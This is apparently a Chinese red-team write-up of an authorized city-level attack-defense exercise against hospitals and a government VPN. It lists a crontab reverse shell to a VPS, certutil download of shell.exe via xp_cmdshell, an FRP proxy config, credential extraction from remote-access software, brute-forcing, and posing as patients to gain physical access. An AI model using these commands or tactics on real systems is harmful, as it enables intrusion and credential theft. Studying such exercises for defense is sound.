记一次有趣的地市攻防演练经历
字数 1678 2025-08-06 21:48:56
地市攻防演练实战技术总结
0x00 前言
本文详细记录了一次真实地市攻防演练中的技术细节和实战经验,包含外网突破、内网横向移动、社工技巧等多个维度的技术要点。所有目标均已获得授权,内容仅供安全研究学习使用。
0x01 攻击路径与技术细节
某医院外网突破案例
路径1/路径2:外网弱口令突破
- C段信息收集:通过目标官网IP收集同C段资产
- H3C设备发现:找到H3C网络设备,尝试默认审计账号(admin/admin等)
- 权限确认:登陆后查看授权信息确认目标归属
- 非标端口扫描:全端口扫描发现非标准SSH端口(如2222等)
- SSH弱口令利用:常见弱口令组合尝试(root/root, admin/admin@123等)
- 持久化控制:通过crontab设置反弹shell
crontab -e bash -c 'exec bash -i &>/dev/tcp/[VPS_IP]/[PORT] <&1'
内网横向技术
- 快速扫描工具:使用fscan扫描内网
./fscan -h 10.0.0.0/8 - 代理搭建:使用FRP建立Socks5代理
# frps.ini [common] bind_port = 8945 # frpc.ini [common] server_addr = [VPS_IP] server_port = 8945 tls_enable = true pool_count = 5 [plugin_socks] type = tcp remote_port = 35145 plugin = socks5 plugin_user = admin plugin_passwd = Admin@123 use_encryption = true use_compression = true - 代理验证:使用Proxifier测试代理连通性
路径3:MSSQL服务器利用
- xp_cmdshell启用:
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; - 命令执行:
exec master..xp_cmdshell "whoami" - 文件下载:
exec master..xp_cmdshell "certutil -urlcache -split -f http://[VPS_IP]/shell.exe C:\\Windows\\Temp\\shell.exe"
路径4:权限提升与信息收集
- Everything高级搜索:
- 关键词:
密码|信息科|资产表|拓扑|账号|设备|pass|user|config|管理|规划 - 正则表达式搜索提高效率
- 关键词:
- 社工密码生成:使用CPassword工具
# 修改username.txt和dict.txt后运行 python3 createDict.py - 批量爆破:
kscan.exe -t 10.0.0.0/8 --hydra --hydra-pass file:pwd.txt
路径5:火绒控制台利用
- 浏览器密码提取:从Firefox等浏览器获取保存的密码
- 文件分发功能:通过火绒控制台分发并自动执行payload
某综合医院社工案例
路径1:WIFI突破
- WIFI万能钥匙:获取附近WIFI密码
- 二维码扫描:获取访客网络认证信息
- 网络设备登录:尝试H3C默认凭证
路径2:向日葵RCE利用
- 漏洞利用:向日葵远程代码执行漏洞
- 备用方案:安装ToDesk等替代远程工具
路径3:靶机控制
- 内网扫描:通过跳板机扫描内网段
- 远程工具利用:利用发现的ToDesk保存的连接直接控制靶机
某专科医院近源攻击
路径1:WIFI接入
- 社工技巧:伪装就诊人员进入医院
- Kali Nethunter:使用手机版Kali进行渗透
路径2:MS17-010利用
- 漏洞检测:
msfconsole use auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 10.0.0.0/8 run - 向日葵密码提取:
# 注册表查询 reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginInfo reg query HKEY_USERS\.DEFAULT\Software\Oray\SunLogin\SunloginClient\SunloginGreenInfo - 密码解密:使用Sunflower_get_Password工具解密
某ZF单位VPN突破
- L2TP VPN搭建:通过获取的网络设备权限搭建VPN隧道
- NAT映射利用:通过Telnet测试内网脆弱端口映射
0x02 工具与技术总结
外网打点工具链
- 资产收集:
- ENScan_GO
- Kunyu/Fofa_viewer/infoSearchAll
- 空间测绘:
- Fofa/360Quake/Shadow/ZoomEye/Hunter
- 轻量扫描器:
- kscan(服务识别)
- fscan(C段快速识别)
- 子域名收集:
- OneForAll/Subfinder/ksubdomain
- Web指纹识别:
- EHole(可二次开发)
- TideFinger
- httpx(获取网页基础信息)
内网渗透要点
- 信息收集:
- Everything文件搜索(正则表达式)
- 浏览器/微信/QQ保存的密码
- 回收站/共享盘/邮件/协同软件
- 远程软件保存的连接信息
- 常见漏洞:
- 向日葵RCE
- Weblogic漏洞
- Struts2漏洞
- Redis未授权
- Shiro反序列化
0x03 经验总结
- 密码规律分析:注意收集到的密码中的时间戳(@2022)、特殊字符组合(!@#123)等模式
- 多持久化通道:建立多个反弹shell防止单点失效
- 应急方案准备:如电脑故障时的替代方案(文中使用销售电脑)
- 规则理解:充分理解攻防演练评分规则,针对性拿分
- 社工技巧:合理伪装身份获取物理接入权限
0x04 参考资源
注:本文所有技术内容仅限授权测试使用,未经授权进行测试属于违法行为。